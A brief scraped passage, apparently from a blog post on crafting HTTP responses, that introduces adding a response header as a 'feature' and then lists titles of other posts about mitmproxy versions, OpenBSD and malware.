Specifying features</h2> One example of a "feature" is a response header. Lets embellish our response by adding one:</p>

mitmproxy 0.8

mitmproxy 0.7

OpenBSD in decline?

Malware